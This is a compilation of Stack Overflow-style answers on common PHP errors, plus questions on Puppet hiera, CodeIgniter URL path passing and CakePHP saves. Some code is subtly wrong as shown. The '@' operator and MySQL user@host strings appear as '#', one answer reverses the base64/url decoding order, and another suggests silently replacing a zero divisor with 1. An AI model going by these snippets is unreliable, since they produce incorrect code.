The warning itself does not break anything, but most often a script does not properly work if file-access is prevented.
The fix is normally to change the PHP configuration, the related setting is called open_basedir.
Sometimes the wrong file or directory names are used, the fix is then to use the right ones.
Related Questions:
open_basedir restriction in effect. File(/) is not within the allowed path(s):
All PHP "Warning: open_basedir restriction in effect" Querstions on Stackoverflow
Parse error: syntax error, unexpected '['
This error comes in two variatians:
Variation 1
$arr = [1, 2, 3];
This array initializer syntax was only introduced in PHP 5.4; it will raise a parser error on versions before that. If possible, upgrade your installation or use the old syntax:
$arr = array(1, 2, 3);
See also this example from the manual.
Variation 2
$suffix = explode(',', 'foo,bar')[1];
Array dereferencing function results was also introduced in PHP 5.4. If it's not possible to upgrade you need to use a (temporary) variable:
$parts = explode(',', 'foo,bar');
$suffix = $parts[1];
See also this example from the manual.
Warning: [function] expects parameter 1 to be resource, boolean given
(A more general variation of Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given)
Resources are a type in PHP (like strings, integers or objects). A resource is an opaque blob with no inherently meaningful value of its own. A resource is specific to and defined by a certain set of PHP functions or extension. For instance, the Mysql extension defines two resource types:
There are two resource types used in the MySQL module. The first one is the link identifier for a database connection, the second a resource which holds the result of a query.
The cURL extension defines another two resource types:
... a cURL handle and a cURL multi handle.
When var_dumped, the values look like this:
$resource = curl_init();
var_dump($resource);
resource(1) of type (curl)
That's all most resources are, a numeric identifier ((1)) of a certain type ((curl)).
You carry these resources around and pass them to different functions for which such a resource means something. Typically these functions allocate certain data in the background and a resource is just a reference which they use to keep track of this data internally.
The "... expects parameter 1 to be resource, boolean given" error is typically the result of an unchecked operation that was supposed to create a resource, but returned false instead. For instance, the fopen function has this description:
Return Values
Returns a file pointer resource on success, or FALSE on error.
So in this code, $fp will either be a resource(x) of type (stream) or false:
$fp = fopen(...);
If you do not check whether the fopen operation succeed or failed and hence whether $fp is a valid resource or false and pass $fp to another function which expects a resource, you may get the above error:
$fp = fopen(...);
$data = fread($fp, 1024);
Warning: fread() expects parameter 1 to be resource, boolean given
You always need to error check the return value of functions which are trying to allocate a resource and may fail:
$fp = fopen(...);
if (!$fp) {
trigger_error('Failed to allocate resource');
exit;
}
$data = fread($fp, 1024);
Related Errors:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given
Warning: Illegal string offset 'XXX'
This happens when you try to access an array element with the square bracket syntax, but you're doing this on a string, and not on an array, so the operation clearly doesn't make sense.
Example:
$var = "test";
echo $var["a_key"];
If you think the variable should be an array, see where it comes from and fix the problem there.
Code doesn't run/what looks like parts of my PHP code are output
If you see no result from your PHP code whatsoever and/or you are seeing parts of your literal PHP source code output in the webpage, you can be pretty sure that your PHP isn't actually getting executed. If you use View Source in your browser, you're probably seeing the whole PHP source code file as is. Since PHP code is embedded in <?php ?> tags, the browser will try to interpret those as HTML tags and the result may look somewhat confused.
To actually run your PHP scripts, you need:
a web server which executes your script
to set the file extension to .php, otherwise the web server won't interpret it as such*
to access your .php file via the web server
* Unless you reconfigure it, everything can be configured.
This last one is particularly important. Just double clicking the file will likely open it in your browser using an address such as:
file://C:/path/to/my/file.php
This is completely bypassing any web server you may have running and the file is not getting interpreted. You need to visit the URL of the file on your web server, likely something like:
http://localhost/my/file.php
You may also want to check whether you're using short open tags <? instead of <?php and your PHP configuration has turned short open tags off.
Also see PHP code is not being executed, instead code shows on the page
Warning: Array to string conversion
Notice: Array to string conversion
(A notice until PHP 7.4, since PHP 8.0 a warning)
This simply happens if you try to treat an array as a string:
$arr = array('foo', 'bar');
echo $arr; // Notice: Array to string conversion
$str = 'Something, ' . $arr; // Notice: Array to string conversion
An array cannot simply be echo'd or concatenated with a string, because the result is not well defined. PHP will use the string "Array" in place of the array, and trigger the notice to point out that that's probably not what was intended and that you should be checking your code here. You probably want something like this instead:
echo $arr[0]; // displays foo
$str = 'Something ' . join(', ', $arr); //displays Something, foo, bar
Or loop the array:
foreach($arr as $key => $value) {
echo "array $key = $value";
// displays first: array 0 = foo
// displays next: array 1 = bar
}
If this notice appears somewhere you don't expect, it means a variable which you thought is a string is actually an array. That means you have a bug in your code which makes this variable an array instead of the string you expect.
Warning: mysql_connect(): Access denied for user 'name'#'host'
This warning shows up when you connect to a MySQL/MariaDB server with invalid or missing credentials (username/password). So this is typically not a code problem, but a server configuration issue.
See the manual page on mysql_connect("localhost", "user", "pw") for examples.
Check that you actually used a $username and $password.
It's uncommon that you gain access using no password - which is what happened when the Warning: said (using password: NO).
Only the local test server usually allows to connect with username root, no password, and the test database name.
You can test if they're really correct using the command line client:
mysql --user="username" --password="password" testdb
Username and password are case-sensitive and whitespace is not ignored. If your password contains meta characters like $, escape them, or put the password in single quotes.
Most shared hosting providers predeclare mysql accounts in relation to the unix user account (sometimes just prefixes or extra numeric suffixes). See the docs for a pattern or documentation, and CPanel or whatever interface for setting a password.
See the MySQL manual on Adding user accounts using the command line. When connected as admin user you can issue a query like:
CREATE USER 'username'#'localhost' IDENTIFIED BY 'newpassword';
Or use Adminer or WorkBench or any other graphical tool to create, check or correct account details.
If you can't fix your credentials, then asking the internet to "please help" will have no effect. Only you and your hosting provider have permissions and sufficient access to diagnose and fix things.
Verify that you could reach the database server, using the host name given by your provider:
ping dbserver.hoster.example.net
Check this from a SSH console directly on your webserver. Testing from your local development client to your shared hosting server is rarely meaningful.
Often you just want the server name to be "localhost", which normally utilizes a local named socket when available. Othertimes you can try "127.0.0.1" as fallback.
Should your MySQL/MariaDB server listen on a different port, then use "servername:3306".
If that fails, then there's a perhaps a firewall issue. (Off-topic, not a programming question. No remote guess-helping possible.)
When using constants like e.g. DB_USER or DB_PASSWORD, check that they're actually defined.
If you get a "Warning: Access defined for 'DB_USER'#'host'" and a "Notice: use of undefined constant 'DB_PASS'", then that's your problem.
Verify that your e.g. xy/db-config.php was actually included and whatelse.
Check for correctly set GRANT permissions.
It's not sufficient to have a username+password pair.
Each MySQL/MariaDB account can have an attached set of permissions.
Those can restrict which databases you are allowed to connect to, from which client/server the connection may originate from, and which queries are permitted.
The "Access denied" warning thus may as well show up for mysql_query calls, if you don't have permissions to SELECT from a specific table, or INSERT/UPDATE, and more commonly DELETE anything.
You can adapt account permissions when connected per command line client using the admin account with a query like:
GRANT ALL ON yourdb.* TO 'username'#'localhost';
If the warning shows up first with Warning: mysql_query(): Access denied for user ''#'localhost' then you may have a php.ini-preconfigured account/password pair.
Check that mysql.default_user= and mysql.default_password= have meaningful values.
Oftentimes this is a provider-configuration. So contact their support for mismatches.
Find the documentation of your shared hosting provider:
e.g. HostGator, GoDaddy, 1and1, DigitalOcean, BlueHost, DreamHost, MediaTemple, ixWebhosting, lunarhosting, or just google yours´.
Else consult your webhosting provider through their support channels.
Note that you may also have depleted the available connection pool. You'll get access denied warnings for too many concurrent connections. (You have to investigate the setup. That's an off-topic server configuration issue, not a programming question.)
Your libmysql client version may not be compatible with the database server. Normally MySQL and MariaDB servers can be reached with PHPs compiled in driver. If you have a custom setup, or an outdated PHP version, and a much newer database server, or significantly outdated one - then the version mismatch may prevent connections. (No, you have to investigate yourself. Nobody can guess your setup).
More references:
Serverfault: mysql access denied for 'root'#'name of the computer'
Warning: mysql_connect(): Access denied
Warning: mysql_select_db() Access denied for user ''#'localhost' (using password: NO)
Access denied for user 'root'#'localhost' with PHPMyAdmin
Btw, you probably don't want to use mysql_* functions anymore. Newcomers often migrate to mysqli, which however is just as tedious. Instead read up on PDO and prepared statements.
$db = new PDO("mysql:host=localhost;dbname=testdb", "username", "password");
Deprecated: Array and string offset access syntax with curly braces is deprecated
String offsets and array elements could be accessed by curly braces {} prior to PHP 7.4.0:
$string = 'abc';
echo $string{0}; // a
$array = [1, 2, 3];
echo $array{0}; // 1
This has been deprecated since PHP 7.4.0 and generates a warning:
Deprecated: Array and string offset access syntax with curly braces is deprecated
You must use square brackets [] to access string offsets and array elements:
$string = 'abc';
echo $string[0]; // a
$array = [1, 2, 3];
echo $array[0]; // 1
The RFC for this change links to a PHP script which attempts to fix this mechanically.
Warning: Division by zero
The warning message 'Division by zero' is one of the most commonly asked questions among new PHP developers. This error will not cause an exception, therefore, some developers will occasionally suppress the warning by adding the error suppression operator # before the expression. For example:
$value = #(2 / 0);
But, like with any warning, the best approach would be to track down the cause of the warning and resolve it. The cause of the warning is going to come from any instance where you attempt to divide by 0, a variable equal to 0, or a variable which has not been assigned (because NULL == 0) because the result will be 'undefined'.
To correct this warning, you should rewrite your expression to check that the value is not 0, if it is, do something else. If the value is zero you either should not divide, or you should change the value to 1 and then divide so the division results in the equivalent of having divided only by the additional variable.
if ( $var1 == 0 ) { // check if var1 equals zero
$var1 = 1; // var1 equaled zero so change var1 to equal one instead
$var3 = ($var2 / $var1); // divide var1/var2 ie. 1/1
} else {
$var3 = ($var2 / $var1); // if var1 does not equal zero, divide
}
Related Questions:
warning: division by zero
Warning: Division By Zero Working on PHP and MySQL
Division by zero error in WordPress Theme
How to suppress the “Division by zero” error
How to catch a division by zero?
Strict Standards: Non-static method [<class>::<method>] should not be called statically
Occurs when you try to call a non-static method on a class as it was static, and you also have the E_STRICT flag in your error_reporting() settings.
Example :
class HTML {
public function br() {
echo '<br>';
}
}
HTML::br() or $html::br()
You can actually avoid this error by not adding E_STRICT to error_reporting(), eg
error_reporting(E_ALL & ~E_STRICT);
since as for PHP 5.4.0 and above, E_STRICT is included in E_ALL [ref]. But that is not adviceable. The solution is to define your intended static function as actual static :
public static function br() {
echo '<br>';
}
or call the function conventionally :
$html = new HTML();
$html->br();
Related questions :
How can I solve "Non-static method xxx:xxx() should not be called statically in PHP 5.4?

Evaluation Error while using the Hiera hash in puppet

I have the following values in my hiera yaml file:
test::config_php::php_modules :
-'soap'
-'mcrypt'
-'pdo'
-'mbstring'
-'php-process'
-'pecl-memcache'
-'devel'
-'php-gd'
-'pear'
-'mysql'
-'xml'
and following is my test class:
class test::config_php (
$php_version,
$php_modules = hiera_hash('php_modules', {}),
$module_name,
){
class { 'php':
version => $php_version,
}
$php_modules.each |String $php_module| {
php::module { $php_module: }
}
}
While running my puppet manifests I get the following error:
Error: Evaluation Error: Error while evaluating a Function Call, create_resources(): second argument must be a hash at /tmp/vagrant-puppet/modules-f38a037289f9864906c44863800dbacf/ssh/manifests/init.pp:46:3 on node testdays-1a.vagrant.loc.vag
I am quite confused on what exactly am I doing wrong. My puppet version is 3.6.2 and I also have parser = future
I would really appreciate any help here.
Looks like your YAML was slightly off.
You don't really need quotes in YAML.
Your indentation was two instead of one.
Your first colon on the first time was spaced. This will throw a syntax error.
it should look more like this:
test::config_php::php_modules:
- soap
- mcrypt
- pdo
- mbstring
- php-process
- pecl-memcache
- devel
- php-gd
- pear
- mysql
- xml
In the future try and look up YAML parsers like this: link
The problem was with my puppet version, somehow version 3.6 acts weird while creating resources, for instance it was failing on the following line,:
create_resources('::ssh::client::config::user', $fin_users_client_options)
The code snippet above is part of ssh module from puppet labs, which I assume is throughly tested and shouldn't be a reason for the an exception.
A further analysis led to the fact that the exception was thrown when the parameter parser = future was set in the config file
I cannot iterate using each without setting future as the parser, therefore I decided to change my source as follow:
I created a new class:
define test::install_modules {
php::module { $name: }
}
and then I changed the config config_php to:
class test::config_php (
$php_version,
$php_modules = [],
){
class { 'php':
version => $php_version,
}
install_modules { $php_modules: }
}
Everything seems to be much better now.

file path is not retrieved in codeigniter

I am creating an invoice on users desired package selection. The pdf file is being created (but it takes some time), while the code checks for the file. The file exists. Here is the address of the file;
C:/wamp/www/proposal/file/invoice/Basic_52_60.pdf
This is the correct path to the file. I am passing this path to the function in another controller as;
redirect('email/email_invoice/'.$file);
When I tested the file path in email_invoice function, it displayed only c:
c:
The slashes in the path are not transferred. I don't know exactly what is the problem.
CodeIgniter considers each segment of the URL a parameter after the controller and method. So you are essentially passing 7 variables to the Email::email_invoice() method.
You could use some sort of encoding to pass it as one variable and then decode it on the other side such as:
$file = base64_encode($file);
redirect('email/email_invoice/' . $file);
Then in Email.php:
public function email_invoice($file) {
$file = base64_decode($file);
}
Or you could pass it as a get parameter:
redirect('email/email_invoice/?file=' . $file);
public function email_invoice() {
$file = $this->input->get('file');
}
The latter requires the $_GET array to be enabled which it is not by default.
UPDATE - Using Flashdata
Based on some of the comments I thought I would update this answer. base64_encode() can result in characters that will break the URL so you would need to use:
$file = urlencode(base64_encode($file));
redirect('email/email_invoice/' . $file);
And on the other side:
public function email_invoice($file) {
$file = urldecode(base64_decode($file));
}
As the OP pointed out $_GET variables can be manipulated leaving you open to directory traversal attacks or other vulnerabilities. Even if done right you would need extra code for security. Encoding can easily be spotted and altered.
File paths probably shouldn't be carried around in the URL. POST data can be manipulated also even if it is less obvious. Security through obscurity is not security at all. A better approach would be to use flashdata.
$this->session->set_flashdata('email_invoice_pdf', $file);
redirect('email/email_invoice/');
Then in your controller:
public function email_invoice() {
$file = $this->session->flashdata('email_invoice_pdf');
}
That's it. The session was used to carry the file path to the next page request, but after that it is gone.

CakePHP: save() fails but there are no validationErrors

I am trying to save an item through my model, but saving fails.
When I output validationErrors - I get empty array, so no validation problems seem to be available. What could be failing my save()?
function resave($wid, $kTime){
$this->contain();
$word = $this->getById($wid);
// Successfully tretrieved here
$word['ModelName']['column'] = $kTime;
if($this->save($word)){
return 'success';
}else{
// this returns empty array
return $this->validationErrors;
}
}
To save yourself some time in the future, if a save() isn't working, the first place to look is in your SQL log and errors.
You should try installing Debug Kit Toolbar for CakePHP (https://github.com/cakephp/debug_kit). It makes it easy to view your SQL log, along with a bunch of other useful stuff. Or, alternatively, you can just put this in your layout file to view SQL history/errors:
<?php echo $this->element('sql_dump'); ?>
It was a problem with float and array type. I investigated it with gettype() and figured it out.

Resources